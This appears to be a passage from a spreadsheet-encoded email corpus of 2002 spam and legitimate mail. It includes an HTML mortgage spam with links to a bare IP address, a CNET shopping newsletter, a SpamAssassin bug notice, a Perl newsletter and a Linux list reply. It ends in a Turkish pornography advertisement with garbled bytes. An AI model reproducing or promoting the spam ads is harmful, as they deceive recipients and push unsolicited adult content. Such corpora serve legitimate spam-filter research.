               COST OUT OF POCKET&lt;/font&gt;&lt;/b&gt;&lt;/dd&gt;
               &lt;dd&gt;&lt;b&gt;&lt;font face="Webdings" size="5" color="#FF0000" PTSIZE="10"&gt;
               a&lt;/font&gt;&lt;/b&gt;&lt;font face="Verdana,Arial,Helvetica,sans-serif" size="2"&gt;&lt;b&gt;NO 
               OBLIGATION&lt;/b&gt;&lt;/font&gt; &lt;/dd&gt;
               &lt;dd&gt;&lt;b&gt;&lt;font face="Webdings" size="5" color="#FF0000" PTSIZE="10"&gt;
               a&lt;/font&gt;&lt;/b&gt;&lt;font face="Verdana,Arial,Helvetica,sans-serif" size="2"&gt;&lt;b&gt;FREE 
               CONSULTATION&lt;/b&gt;&lt;/font&gt; &lt;/dd&gt;
               &lt;dd&gt;&lt;b&gt;&lt;font face="Webdings" size="5" color="#FF0000" PTSIZE="10"&gt;
               a&lt;/font&gt;&lt;/b&gt;&lt;font face="Verdana,Arial,Helvetica,sans-serif" size="2"&gt;&lt;b&gt;ALL 
               CREDIT GRADES ACCEPTED&lt;/b&gt;&lt;/font&gt; &lt;/dd&gt;
             &lt;/dl&gt;
             &lt;div align="center"&gt;
               &lt;font face="Verdana,Arial,Helvetica,sans-serif" color="red" size="2"&gt;
               &lt;b&gt;
               &lt;a href="http://66.231.133.63/index.html?ID=b32"&gt;Rates as low as 
               6.25% won't stay this low forever CLICK HERE&lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;/div&gt;
             &lt;div align="center"&gt;
               &amp;nbsp;&lt;/div&gt;
             &lt;div align="center"&gt;
 &lt;font size="2" PTSIZE="10"&gt;
               &lt;b&gt;
             &lt;font face="Verdana,Arial,Helvetica,sans-serif" style="font-size: 6pt"&gt;
               * based on mortgage rate as of 5-15-02 as low as 6.25% see lender 
               for details&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/div&gt;
             &lt;/td&gt;
             &lt;td vAlign="top" width="4" height="1"&gt;
             &lt;div align="right"&gt;
               &amp;nbsp;&lt;/div&gt;
             &lt;/td&gt;
             &lt;td width="175" height="1" bgcolor="#FFFFFF" bordercolor="#006600"&gt;
             &lt;h1&gt;&lt;span style="vertical-align: middle"&gt;
             &lt;font face="Webdings" style="font-size: 200" color="#006600"&gt;
             &lt;a href="http://66.231.133.63/index.html?ID=b32"&gt;
             &lt;font color="#006600"&gt;H&lt;/font&gt;&lt;/a&gt;&lt;/font&gt;&lt;/span&gt;&lt;/h1&gt;
             &lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
         &lt;table cellSpacing="0" cellPadding="3" width="472" border="0"&gt;
           &lt;tr&gt;
             &lt;td colSpan="2" height="64"&gt;
             &lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;&lt;b&gt;
             &lt;table cellSpacing="2" cellPadding="0" width="482" border="0" height="38"&gt;
               &lt;tr&gt;
                 &lt;td width="327" height="36" style="border-style: solid; border-width: 0"&gt;
                 &lt;font face="Verdana,Arial,Helvetica,sans-serif" size="2"&gt;Apply 
                 now and one of our lending partners will get back to you within 
                 48 hours.&lt;/font&gt;&lt;/font&gt;&lt;font face="Verdana,Arial,Helvetica,sans-serif" style="font-size: 6pt"&gt;&lt;/td&gt;
                 &lt;/font&gt;
             &lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;
                 &lt;td width="141" bgcolor="#FF0000" height="36" style="border-left-style: solid; border-left-width: 1"&gt;
                 &lt;p align="center"&gt;&lt;b&gt;&lt;font color="#FFFFFF" size="4"&gt;
                 &lt;a style="text-decoration: none" href="http://66.231.133.63/index.html?ID=b32"&gt;
                 &lt;font color="#FFFFFF"&gt;CLICK HERE!&lt;/font&gt;&lt;/a&gt;&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
             &lt;/font&gt;
             &lt;/b&gt;&lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
         &lt;/td&gt;
       &lt;/tr&gt;
     &lt;/table&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;p&gt;To Be Removed Please &amp;quot;&lt;a href="http://66.231.133.63/final/index_remoov.html?ID=b32"&gt;Clicking 
 Here&lt;/a&gt;&amp;quot; . &lt;/p&gt;
 &lt;/font&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [SAdev] [Bug 779] rule broken: CORRUPT_MSGID
</t>
  </si>
  <si>
    <t xml:space="preserve">http://www.hughes-family.org/bugzilla/show_bug.cgi?id=779
 spamassassin-contrib@msquadrat.de changed:
            What    |Removed                     |Added
 ----------------------------------------------------------------------------
              Status|NEW                         |RESOLVED
          Resolution|                            |FIXED
 ------- Additional Comments From spamassassin-contrib@msquadrat.de  2002-10-03 14:21 -------
 I think INVALID_MSGID does what this rule was supposed to do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</si>
  <si>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
 &lt;html&gt;
 &lt;head&gt;
 	&lt;title&gt;Shopper Newsletter: Alerts&lt;/title&gt;
 &lt;/head&gt;
 &lt;body bgcolor="#EEEEEE" alink="#0000FF" vlink="#0000FF"&gt;
 &lt;center&gt;
 &lt;A href="top"&gt;&lt;/A&gt;&lt;!-- header --&gt;
 	&lt;table border=0 cellpadding=0 cellspacing=0 width=612 bgcolor="#ffffff"&gt;
 	&lt;tr valign=top&gt;
 		&lt;td width=442 colspan=5&gt;
 			&lt;img src="http://www.cnet.com/i/sh/nl/442_shopperALERT.gif" width="442" height="60" border="0" alt="CNET Shopper Newsletter Alerts"&gt;&lt;br&gt;
 				&lt;table width=442 cellpadding=0 cellspacing=0 border=0 bgcolor="#CCCCCC"&gt;
 					&lt;tr&gt;
 						&lt;td bgcolor="#999999" colspan=1&gt;
 							&lt;img src="http://home.cnet.com/b.gif" width="1" height="1" border="0"&gt;&lt;br&gt;
 						&lt;/td&gt;
 						&lt;td bgcolor="#666666" colspan=1&gt;
 							&lt;img src="http://home.cnet.com/b.gif" width="1" height="1" border="0"&gt;&lt;br&gt;
 						&lt;/td&gt;
 						&lt;td bgcolor="#666666" colspan=2&gt;
 							&lt;img src="http://home.cnet.com/b.gif" width="1" height="1" border="0"&gt;&lt;br&gt;
 						&lt;/td&gt;
 					&lt;/tr&gt;
 					&lt;tr&gt;
 						&lt;td bgcolor="#999999" width=1 rowspan=2&gt;
 							&lt;img src="http://home.cnet.com/b.gif" width="1" height="10" border="0"&gt;&lt;br&gt;
 						&lt;/td&gt;
 						&lt;td bgcolor="#666666" width=1 rowspan=2&gt;
 							&lt;img src="http://home.cnet.com/b.gif" width="1" height="10" border="0"&gt;&lt;br&gt;
 						&lt;/td&gt;
 						&lt;td width=9 rowspan=2&gt;
 							&lt;img src="http://home.cnet.com/b.gif" width="1" height="10" border="0"&gt;&lt;br&gt;
 						&lt;/td&gt;
 						&lt;td  width=430&gt;
 							&lt;img src="http://home.cnet.com/b.gif" width="1" height="10" border="0"&gt;&lt;br&gt;
 						&lt;/td&gt;				
 					&lt;/tr&gt;
 					&lt;tr&gt;
 						&lt;td bgcolor="#666666"&gt;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&lt;img src="http://www.cnet.com/Ads/Media/Images/ad10-dk.gif" width="120" height="10" border="0"&gt;&lt;br&gt;
 						&lt;/td&gt;
 					&lt;/tr&gt;
 				&lt;/table&gt;
 &lt;!-- /advertisement label gif --&gt;
 &lt;!-- insert ad here --&gt;
 &lt;iframe src="http://www.zdnet.com/include/ads/ifc/RGROUP=2560" scrolling="no" frameborder="0" hspace="0" vspace="0" height="600" width="160" marginheight="0" marginwidth="0"&gt;
 &lt;script language="JavaScript" src="http://www.zdnet.com/include/ads/js/RGROUP=2560"&gt;
 &lt;/script&gt;
 &lt;/iframe&gt;
 &lt;!-- /insert ad here --&gt;
 &lt;br&gt;
 &lt;!-- Most Popular --&gt;
 &lt;!-- /Most Popular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href="http://clickthru.online.com/Click?q=0e--eOTIiQzh-iW43J4r8dJx98lbKRR" &gt;Live tech help NOW!&lt;/a&gt;&lt;p&gt; 
 &lt;a href="http://clickthru.online.com/Click?q=23-sFcGINM80tP2JITiAv2Y9ZZvQKFR" &gt;April's tech award&lt;/a&gt;&lt;p&gt;  
 &lt;a href="http://clickthru.online.com/Click?q=38-bLkmIRM2Lk0NNk6nhJiSUxuD-D9R" &gt;1 million open jobs&lt;/a&gt;&lt;p&gt; 
 &lt;a href="http://clickthru.online.com/Click?q=4e-0Y95InZA4ZVmYVkIKlsTn8N_JjiR" &gt;News.com: Top CIOs&lt;/a&gt; &lt;p&gt; 
 &lt;a href="http://clickthru.online.com/Click?q=63-tPKjIHWSs6_XkQCg_9-hwkp_WElR" &gt;ZDNet: PeopleSoft &lt;/a&gt; 
 &lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
 &lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/P&gt;
 &lt;!-- End Vertical Brick--&gt;
 &lt;!-- End Vertical Brick--&gt;
 					&lt;td width=9 rowspan=2&gt;&lt;img src="http://www.cnet.com/i/nl/dd_c.gif" width=9 height=60&gt;&lt;br&gt;
 						&lt;table width=9 cellpadding=0 cellspacing=0 border=0&gt;
 							&lt;tr&gt;
 								&lt;td bgcolor="#666666"&gt;&lt;img src="http://www.cnet.com/b.gif" width=9 height=1&gt;&lt;/td&gt;
 							&lt;/tr&gt;
 							&lt;tr&gt;
 								&lt;td bgcolor="#CCCCCC"&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=10&gt;&lt;/td&gt;
 							&lt;/tr&gt;
 							&lt;tr&gt;
 								&lt;td bgcolor="#666666"&gt;&lt;img src="http://www.cnet.com/b.gif" width=9 height=1&gt;&lt;/td&gt;
 							&lt;/tr&gt;
 						&lt;/table&gt;
 					&lt;/td&gt;
 					&lt;td width=1 bgcolor="#666666" rowspan=2&gt;
 						&lt;table width=1 cellpadding=0 cellspacing=0 border=0&gt;
 							&lt;tr&gt;
 								&lt;td bgcolor="#eeeeee"&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=60&gt;&lt;/td&gt;
 							&lt;/tr&gt;
 						&lt;/table&gt;
 					&lt;/td&gt;
 				&lt;/tr&gt;
 				&lt;tr valign=top&gt;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width=410 bgcolor="#ffffff"&gt;
 						&lt;table cellpadding=0 cellspacing=0 border=0 width=430 bgcolor="#EEEEEE"&gt;
 							&lt;tr valign=top&gt;
 								&lt;td width=10&gt;&lt;/td&gt;
 &lt;!-- Date --&gt;
 								&lt;td&gt;
 									&lt;table cellpadding=0 cellspacing=0 border=0 width=400&gt;
 										&lt;tr&gt;
 											&lt;td&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=6&gt;&lt;/td&gt;
 										&lt;/tr&gt;
 										&lt;tr valign=top&gt;
 											&lt;td width=10&gt;&lt;img src="http://www.cnet.com/b.gif" width=10 height=1&gt;&lt;/td&gt;
 											&lt;td align=right width=400&gt;&lt;img src="http://www.cnet.com/b.gif"&gt;&lt;br&gt;
 											&lt;font face="arial, helvetica" size="-2"&gt;July 9, 2002&lt;/font&gt;&lt;/td&gt;
 										&lt;tr valign=top&gt;
 &lt;!--c4s--&gt;									&lt;td&gt;&lt;A href="#c4s"&gt;&lt;img src="http://www.cnet.com/i/nl/arr.gif" width=10 height=12														border=0&gt;&lt;/A&gt;&lt;/td&gt;
 											&lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;A href="#c4s"&gt;&lt;b&gt;From Computers4Sure&lt;/b&gt;&lt;/A&gt;&lt;BR&gt;Save an extra $50 on the iPaq 3835 PDA.&lt;/font&gt;&lt;/td&gt;
 										&lt;/tr&gt;
 										&lt;tr&gt;
 											&lt;td&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=4&gt;&lt;/td&gt;
 										&lt;/tr&gt;
 &lt;!--dell--&gt;							&lt;td&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=4&gt;&lt;/td&gt;
 										&lt;/tr&gt;
 										&lt;tr valign=top&gt;
 											&lt;td&gt;&lt;A href="#dell"&gt;&lt;img src="http://www.cnet.com/i/nl/arr.gif" width=10 height=12 border=0&gt;&lt;/A&gt;&lt;/td&gt;
 											&lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;A href="#dell"&gt;&lt;b&gt;From Dell&lt;/b&gt;&lt;/A&gt; &lt;BR&gt;Enter to win your chance to win $50,000 from Dell!&lt;/font&gt;&lt;/td&gt;
 										&lt;/tr&gt;
 										&lt;tr&gt;
 											&lt;td&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=6&gt;&lt;/td&gt;
 										&lt;/tr&gt;
 								&lt;/table&gt;
 								&lt;table cellpadding=0 cellspacing=0 border=0 width=410&gt;
 									&lt;tr&gt;
 										&lt;td&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=8&gt;&lt;/td&gt;
 									&lt;/tr&gt;
 								&lt;/table&gt;
 							&lt;/td&gt;
 						&lt;/tr&gt;
 					&lt;/table&gt;
 					&lt;table cellpadding=0 cellspacing=0 border=0 width=430&gt;
 						&lt;tr&gt;
 							&lt;td bgcolor="#999999"&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=1&gt;&lt;/td&gt;
 						&lt;/tr&gt;
 					&lt;/table&gt;
 &lt;br&gt;
 &lt;div style="MARGIN-LEFT: 10px; MARGIN-RIGHT: 10px"&gt;
 &lt;!-- C4S TEMPLATE --&gt;
 &lt;a name="c4s"&gt;
 					&lt;table cellpadding="0" cellspacing="0" border=0 width="410"&gt;
 						&lt;TBODY&gt;
 							&lt;tr&gt;
 								&lt;td valign=bottom&gt;&lt;font face="arial, helvetica" size="3"&gt;&lt;b&gt;Computers4Sure&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
 								&lt;td&gt;
 									&lt;P align=right&gt;	
 										&lt;img style="border: #CCCCCC solid 1px;" src="http://shopper.cnet.com/Images/Resellers/Premier/235579.gif""&gt;&lt;/P&gt;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 Product 1 --&gt;
 							&lt;tr valign="top"&gt;
 								&lt;td width="120"&gt;
 									&lt;a href="http://clickthru.online.com/Click?q=78-d5asIdUDxAS0WI95vnMUN5xspo4R" &gt;&lt;img style="border: #CCCCCC solid 1px;" src="http://shopper.cnet.com/i/co/ps/120/7934746_120_1.gif"&gt;&lt;/a&gt;&lt;/td&gt;
 								&lt;td width="10"&gt;&lt;img src="http://www.cnet.com/b.gif" width=10 height=1&gt;&lt;/td&gt;
 								&lt;td width=270 colspan="2"&gt;
 								&lt;font face="arial, helvetica" size="-1" &gt;
 								&lt;a href="http://clickthru.online.com/Click?q=8d-nbL1Q7no5iCfsTxIiSupcptbPMuR" &gt;&lt;B&gt;iPaq 3835 Pocket PC &lt;/b&gt;&lt;/a&gt; &lt;BR&gt;
 								&amp;#149; $50 rebate &lt;BR&gt; 
 &amp;#149; 64 MB, brilliant TFT screen&lt;BR&gt;
 &amp;#149; 206 MHz Intel processor&lt;BR&gt;
 								&amp;nbsp;&amp;nbsp;&lt;B&gt;Just &lt;font color="#CC0000"&gt;$549&lt;/font&gt; after rebate&lt;/B&gt;
 								&lt;/td&gt;
 							&lt;/tr&gt;
 							&lt;tr&gt;
 								&lt;td width="400" colspan="4"&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=12&gt;&lt;/td&gt;
 							&lt;/tr&gt;						
 &lt;!-- Product 2 --&gt;
 							&lt;tr valign=top&gt;
 								&lt;td width=120&gt;
 									&lt;a href="http://clickthru.online.com/Click?q=a2-6-M7QXZxT7j3ipb9R0CGk_HtsosR" &gt;&lt;img style="border: #CCCCCC solid 1px;" src="http://shopper.cnet.com/i/ce/ps/120/8866992_120_1.gif"&gt;&lt;/a&gt;&lt;/td&gt;
 								&lt;td width="10"&gt;&lt;img src="http://www.cnet.com/b.gif" width=10 height=1&gt;&lt;/td&gt;
 								&lt;td width=270 colspan="2"&gt;
 								&lt;font face="arial, helvetica" size="-1" &gt;
 								&lt;a href="http://clickthru.online.com/Click?q=b7-FOgPQ8JxgI4elI70NpbnpTbdL3ZR" &gt;&lt;B&gt;Cyber-shot Digital Camera DSC-P51&lt;/b&gt;&lt;/a&gt;&lt;BR&gt;
 								&amp;#149; Free shipping&lt;BR&gt;
 								&amp;#149; 2-megapixels, 1280x960 res.&lt;BR&gt;
 								&amp;#149; 2x optical zoom/3x digital zoom&lt;BR&gt;
 								&amp;nbsp;&amp;nbsp;&lt;B&gt;Just &lt;font color="#CC0000"&gt;$300&lt;/font&gt;&lt;/B&gt;
 								&lt;/td&gt;
 							&lt;/tr&gt;
 							&lt;tr&gt;
 								&lt;td width="400" colspan="4"&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=12&gt;&lt;/td&gt;
 							&lt;/tr&gt;
 &lt;!-- Product 3 --&gt;
 							&lt;tr valign=top&gt;
 									&lt;td width=120&gt;
 									&lt;a href="http://clickthru.online.com/Click?q=cc-h4fQQ0Oqt0jNqO_7qeZDozn6f5dR" &gt;&lt;img style="border: #CCCCCC solid 1px;" src="http://shopper.cnet.com/i/co/ps/120/7767019_120_1.gif" width=120 height=90&gt;&lt;/a&gt;&lt;/td&gt;
 								&lt;td width="10"&gt;&lt;img src="http://www.cnet.com/b.gif" width=10 height=1&gt;&lt;/td&gt;
 								&lt;td width=270 colspan="2"&gt;
 								&lt;font face="arial, helvetica" size="-1" &gt;
 								&lt;a href="http://clickthru.online.com/Click?q=e1-6RvNQxk2W7kyO-ZPhsYK3Awi9qcR" &gt;&lt;B&gt;Maxtor DiamondMax D540X 160GB&lt;/b&gt;&lt;/a&gt;&lt;BR&gt;
 								&amp;#149; Outstanding capacity &amp; value&lt;BR&gt;
 								&amp;#149; 2MB buffer, Avg. Seek 12ms &lt;BR&gt;
 								&amp;#149; 5400 RPM, Ultra ATA/133 &lt;BR&gt;
 							    &amp;nbsp;&amp;nbsp;&lt;B&gt;Just &lt;font color="#CC0000"&gt;$260&lt;/font&gt;&lt;/B&gt;
 								&lt;/td&gt;
 							&lt;/tr&gt;
 							&lt;tr&gt;
 								&lt;td width="400" colspan="4"&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=12&gt;&lt;/td&gt;
 							&lt;/tr&gt;
 						&lt;/table&gt;	
 		&lt;p&gt;	&lt;BR CLEAR=ALL&gt;	
 &lt;!-- center ad --&gt;
 &lt;P&gt;
 &lt;P&gt;
 &lt;!-- /center ad --&gt;
 &lt;!-- buy.com TEMPLATE --&gt;
 &lt;a name="dell"&gt;
 					&lt;table cellpadding="0" cellspacing="0" border=0 width="410"&gt;
 						&lt;TBODY&gt;
 							&lt;tr&gt;
 								&lt;td valign=bottom&gt;&lt;font face="arial, helvetica" size="3"&gt;&lt;b&gt;Dell&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
 								&lt;td&gt;
 									&lt;P align=right&gt;	
 										&lt;img style="border: #CCCCCC solid 1px;" src="http://shopper.cnet.com/Images/Resellers/Premier/235085.gif""&gt;&lt;/P&gt;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&lt;tr&gt;
 								&lt;td width="400" colspan="4"&gt;&lt;font face="arial, helvetica" size="-1" &gt;$50K-a-day Giveaway from Dell Home Systems. . .
 Buy any new Dell Home System on or before July 31, 2002 and you'll
 be automatically entered to win $50,000. The next lucky winner
 could be you!
 &lt;BR&gt;
 &lt;a href="http://clickthru.online.com/Click?q=f7-N0QnQLgzok01r_OlrZIGiR6ImOZR" &gt;&lt;B&gt;More rules and info&lt;/b&gt;&lt;/a&gt;
 &lt;/td&gt;
 							&lt;/tr&gt;
 							&lt;tr&gt;
 								&lt;td width="400" colspan="4"&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=12&gt;&lt;/td&gt;
 							&lt;/tr&gt;
 &lt;!-- Product 1 --&gt;
 							&lt;tr valign="top"&gt;
 								&lt;td width="120"&gt;
 									&lt;a href="http://clickthru.online.com/Click?q=0c-_Y3DIc8HTgm-00VWDjP2qJ13b4dR" &gt;&lt;img style="border: #CCCCCC solid 1px;" src="http://shopper.cnet.com/i/co/ps/120/8582529_120_1.gif"&gt;&lt;/a&gt;&lt;/td&gt;
 								&lt;td width="10"&gt;&lt;img src="http://www.cnet.com/b.gif" width=10 height=1&gt;&lt;/td&gt;
 								&lt;td width=270 colspan="2"&gt;
 								&lt;font face="arial, helvetica" size="-1" &gt;
 								&lt;a href="http://clickthru.online.com/Click?q=21-UPROIjdDVciVaQ1oQqYoj1cTQ4cR" &gt;&lt;B&gt;Dell Dimension 4000 series&lt;/b&gt;&lt;/a&gt; &lt;BR&gt;
 								&amp;#149; 1.7 GHz to 2.53 GHz P4&lt;BR&gt;
 								&amp;#149; 128 MB to 1 GB RAM&lt;BR&gt;
 								&amp;#149; Up to 120 GB hard drive&lt;BR&gt;
 								&amp;nbsp;&amp;nbsp;&lt;B&gt;Starting at &lt;font color="#CC0000"&gt;$689&lt;/font&gt;&lt;/B&gt;
 								&lt;/td&gt;
 							&lt;/tr&gt;
 							&lt;tr&gt;
 								&lt;td width="400" colspan="4"&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=12&gt;&lt;/td&gt;
 							&lt;/tr&gt;						
 &lt;!-- Product 2 --&gt;
 							&lt;tr valign=top&gt;
 								&lt;td width=120&gt;
 									&lt;a href="http://clickthru.online.com/Click?q=36-wg7-IiI4ohONo2QMxvH3QainXQRR" &gt;&lt;img style="border: #CCCCCC solid 1px;" src="http://shopper.cnet.com/i/co/ps/120/8582671_120_1.gif"&gt;&lt;/a&gt;&lt;/td&gt;
 								&lt;td width="10"&gt;&lt;img src="http://www.cnet.com/b.gif" width=10 height=1&gt;&lt;/td&gt;
 								&lt;td width=270 colspan="2"&gt;
 								&lt;font face="arial, helvetica" size="-1" &gt;	
 								&lt;a href="http://clickthru.online.com/Click?q=4b-k_l7IBUPP_hrTR6P9VA35c54JMlR" &gt;&lt;B&gt;Dell Dimension 8000 series&lt;/b&gt;&lt;/a&gt;&lt;BR&gt;
 								&amp;#149; 1.8 GHz to 2.53 GHz P4&lt;BR&gt;
 								&amp;#149; 128 MB to 2 GB RAM&lt;BR&gt;
 								&amp;#149; Up to 120 GB hard drive&lt;BR&gt;
 								&amp;nbsp;&amp;nbsp;&lt;B&gt;Starting at &lt;font color="#CC0000"&gt;$919&lt;/font&gt;&lt;/B&gt;
 								&lt;/td&gt;
 							&lt;/tr&gt;
 							&lt;tr&gt;
 								&lt;td width="400" colspan="4"&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=12&gt;&lt;/td&gt;
 							&lt;/tr&gt;
 &lt;!-- Product 3 --&gt;
 						&lt;/table&gt;	
 		&lt;p&gt;	&lt;BR CLEAR=ALL&gt;		 
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;p&gt;
 &lt;/p&gt;&lt;/font&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/DIV&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
 &lt;!-- ### footer ### --&gt;
 &lt;table width="612" bgcolor="#666666" cellpadding="0" cellspacing="0" border="0"&gt;
 &lt;tr&gt;
 &lt;td width="1"&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="1"&gt;&lt;/td&gt;
 &lt;td width="10" bgcolor="#CCCCCC"&gt;&lt;img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bgcolor="#666666"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width="599" bgcolor="#EEEEEE"&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="4"&gt;&lt;/td&gt;
 &lt;td width="1"&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="1"&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;table width="612" bgcolor="#EEEEEE"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width="12"&gt;&lt;img src="http://www.cnet.com/b.gif" width="12" height="1"&gt;&lt;/td&gt;
 &lt;td width="575"&gt;
 &lt;a href='http://nl.com.com/servlet/url_login?email=qqqqqqqqqq-cnet-newsletters@example.com&amp;brand=cnet'&gt;&lt;img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HREF='http://clickthru.online.com/Click?q=61-x9GAz2Lat_TSiZbSKkrzTGSlEPChIsRR'&gt;Unsubscribe&lt;/A&gt;&amp;nbsp;|
 &amp;nbsp;&lt;a href='http://nl.com.com/servlet/url_login?email=qqqqqqqqqq-cnet-newsletters@example.com&amp;brand=cnet'&gt;Manage My Subscriptions&lt;/a&gt;
 &amp;nbsp;|&amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=76-vJf7InBP3_R0CUR1okYP2r70U6iR" &gt;FAQ&lt;/A&gt;&amp;nbsp;|
 &amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=8b-SBGBQY0y_jjfYkxEYIEElDh4B1FR" &gt;Advertise&lt;/A&gt;&lt;br&gt;&lt;/font&gt;
 &lt;!-- /subscription management--&gt;
 &lt;/font&gt;&lt;img src="http://www.zdnet.com/b.gif" width="1" height="8"&gt;&lt;/td&gt;
 &lt;td width="12"&gt;&lt;img src="http://www.cnet.com/b.gif" width="12" height="1"&gt;&lt;/td&gt;
 &lt;td width="1" bgcolor="#666666"&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="1"&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;table width="612" bgcolor="#666666" cellpadding="0" cellspacing="0" border="0"&gt;
 &lt;tr&gt;
 &lt;td width="1" bgcolor="#999999"&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="1"&gt;&lt;/td&gt;
 &lt;td width="1"&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="1"&gt;&lt;/td&gt;
 &lt;td width="9" bgcolor="#CCCCCC"&gt;&lt;img src="http://www.cnet.com/b.gif" width="9" height="1"&gt;&lt;/td&gt;
 &lt;td width="601"&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="1"&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;table width="612" bgcolor="#CCCCCC" cellpadding="0" cellspacing="0" border="0"&gt;
 &lt;tr height="18"&gt;
 &lt;td width="1" bgcolor="#999999"&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="1"&gt;&lt;/td&gt;
 &lt;td width="1" bgcolor="#666666"&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="1"&gt;&lt;/td&gt;
 &lt;td width="9"&gt;&lt;img src="http://www.cnet.com/b.gif" width="9" height="1"&gt;&lt;/td&gt;
 &lt;td width="563" nowrap&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;/font&gt;&lt;/td&gt;
 &lt;td width="1" bgcolor="#666666"&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="1"&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;table width="612" cellpadding="0" cellspacing="0" border="0"&gt;
 &lt;tr&gt;&lt;td bgcolor="#666666"&gt;&lt;img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src="http://gserv-cnet.zdnet.com/clear/outbound.gif?APPID=2&amp;EMID=25136487&amp;NL=e443&amp;ISSUE=2002-07-09" height=1 width=1&gt;    &lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;  &lt;td colspan=2&gt;&lt;font face=Arial, Helvetica, sans-serif size=2&gt;    &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/a&gt;.&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- ### /footer ### --&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 &lt;IMG HEIGHT=1 WIDTH=1 SRC="http://clickthru.online.com/Click?q=a0-11f8-fB6N35HwGddp42g1eIvgdRR"&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [use Perl] Stories for 2002-07-24
</t>
  </si>
  <si>
    <t xml:space="preserve">use Perl Daily Newsletter
 In this issue:
     * Book Review: Web Development with Apache and Perl
 +--------------------------------------------------------------------+
 | Book Review: Web Development with Apache and Perl                  |
 |   posted by pudge on Tuesday July 23, @00:26 (books)               |
 |   http://use.perl.org/article.pl?sid=02/07/23/0327228              |
 +--------------------------------------------------------------------+
 [0]belg4mit writes "I picked up [1]Web Development with Apache and Perl
 thinking it would be about mod_perl, in my mind Apache + perl = mod_perl.
 It's not."
 This story continues at:
     http://use.perl.org/article.pl?sid=02/07/23/0327228
 Discuss this story at:
     http://use.perl.org/comments.pl?sid=02/07/23/0327228
 Links:
     0. http:///pthbb.org/
     1. http://manning.com/petersen/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</si>
  <si>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[ILUG] Network problems
</t>
  </si>
  <si>
    <t xml:space="preserve">Eamonn Shinners wrote:
 &gt; Hi guys,
 &lt;schnip&gt;
 &gt; there is an option in there for something called hisax, but whatever
 &gt; that is, the machine doesn't have one.
 Hisax is one of the ISDN modules : doesn't apply at all in this
 case and won't affect your system.
 Can't really help with the rest, soz.
 Regards,
 Vin
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [scoop] Gerek adres
</t>
  </si>
  <si>
    <t xml:space="preserve">Kaliteli pornonun adresi: http://www.noseks.com
 Binlerce porno resim ve film.
 Yasanmis gerek hikayeler.
 Trk nllerin kaamak ve gizli resimleri.
 Adult oyunlar.
 Telekizlar.
 Hepsi http://www.noseks.com adresinde. sadece tiklayin
 ӆ+,_x007f_޵隊X'uN_x0018_ggr_x001e_ zH^j_x001b_m_x0018__x0007_(_x001f_Ҋ׬r)zjY&amp;j)b	bԢ_x001c_ ^ZOl.ǟ_x001e_ wi+-(_x001e_ ~{޷b?+-wȭz(֥
</t>
  </si>
  <si>
    <t xml:space="preserve">I think that this and other articles confuse Socialism with 
